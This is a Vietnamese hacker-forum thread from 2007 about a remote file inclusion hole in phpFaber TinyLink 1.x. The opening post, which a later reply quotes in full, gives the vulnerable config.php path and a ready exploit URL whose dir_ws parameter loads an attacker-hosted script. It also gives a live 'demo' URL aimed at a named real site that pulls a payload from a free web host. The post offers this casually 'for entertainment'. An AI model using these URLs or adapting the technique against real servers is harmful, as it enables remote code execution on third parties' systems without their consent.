phpFaber TinyLink 1.x (vul + exploit)

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thông tin new bugs và exploits

phpFaber TinyLink 1.x (vul + exploit)

[Announcement] phpFaber TinyLink 1.x (vul + exploit)	07/01/2007 07:45:47 (+0700) \| #1 \| 34764

hoahongtim
Researcher

Joined: 15/07/2002 02:59:49
Messages: 156
Location: Underground
Offline

Đang ngồi nhâm nhi cafe, sẵn rãnh tay gửi lên cho bà con giải trí cuối tuần luôn vậy !!

Product name: phpFaber TinyLink
Affected version: 1.x
Type: Remote file inclusion (PHP Include)
Vendor: phpfaber.com

Cái script này dùng để rút ngắn link lại á, giống như là tinyurl vậy, lỗi coding không kỹ của mấy tay coder, đơn giản nó là lỗi PHP Include hay còn một cái tên gọi là : Remote file inclusion

File dính lỗi là : config.php, path đầy đủ là : /tiny_includes/config.php

Khai thác :

require_once("$dir_ws/tiny_includes/i_INI.php");

http://<server>/<path>/tiny_includes/config.php?dir_ws=http://attacker.txt?

Link demo : smilie

)
http://sid.to/tiny_includes/config.php?dir_ws=http://www.freewebs.com/camauonline/root/hht.txt?

P/S: Discovered by: black_hat_cr @ VnForce Team

[Question] Re: phpFaber TinyLink 1.x (vul + exploit)	07/01/2007 12:35:19 (+0700) \| #2 \| 34812

lonely_Xorhandsome
Elite Member

Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline

khè , lonely là người mở hàng topic này rồi smilie

) , cám ơn bạn về thông tin này , nó cũng hay hay đấy , nhưng dạo này nhiều thị phi quá , nên cũng không dám đụng tay , đụng chân gì , chỉ biết để mà biết thôi hihihi

[Question] phpFaber TinyLink 1.x (vul + exploit)	08/01/2007 03:20:12 (+0700) \| #3 \| 34893

canh_nguyen
Elite Member

Joined: 23/08/2004 18:55:09
Messages: 775
Location: Broken dream
Offline

Cái lỗi nì còn nhiều chú dính quá.

[Question] phpFaber TinyLink 1.x (vul + exploit)	08/01/2007 03:57:26 (+0700) \| #4 \| 34899

~simon~
Member

Joined: 20/12/2006 15:46:42
Messages: 58
Location: nơi bắt đầu
Offline

hoahongtim wrote:

Cái bug này có lâu rùi, đang ngồi nhâm nhi cafe, sẵn rãnh tay gửi lên cho bà con giải trí cuối tuần luôn vậy !!

Product name: phpFaber TinyLink
Affected version: 1.x
Type: Remote file inclusion (PHP Include)
Vendor: phpfaber.com

Cái script này dùng để rút ngắn link lại á, giống như là tinyurl vậy, lỗi coding không kỹ của mấy tay coder, đơn giản nó là lỗi PHP Include hay còn một cái tên gọi là : Remote file inclusion

File dính lỗi là : config.php, path đầy đủ là : /tiny_includes/config.php

Khai thác :

require_once("$dir_ws/tiny_includes/i_INI.php");

http://<server>/<path>/tiny_includes/config.php?dir_ws=http://attacker.txt?

Link demo : )
http://sid.to/tiny_includes/config.php?dir_ws=http://www.freewebs.com/camauonline/root/hht.txt?

à cho hỏi hoahongtim xíu cái này bác lấy ở đâu hay tự tìm ra thế smilie

cái này post lên ở đây lâu rồi :
https://hcegroup.vn/forums/showthread.php?t=1444

[Question] phpFaber TinyLink 1.x (vul + exploit)	08/01/2007 13:01:20 (+0700) \| #5 \| 34955

hoahongtim
Researcher

Joined: 15/07/2002 02:59:49
Messages: 156
Location: Underground
Offline

sac, thì ra là cái này bên HCE à, không để ý nữa, bửa ngồi cafe + YM! online, thấy thằng em quen gửi cái link bị lỗi qua, nhìn thấy là có thể exploit = include nên exploit thử và gửi lên luôn, nếu là của HCE để HHT chỉnh lại bài viết vậy, thông củm nha :-D

Go to:

Users currently in here
1 Anonymous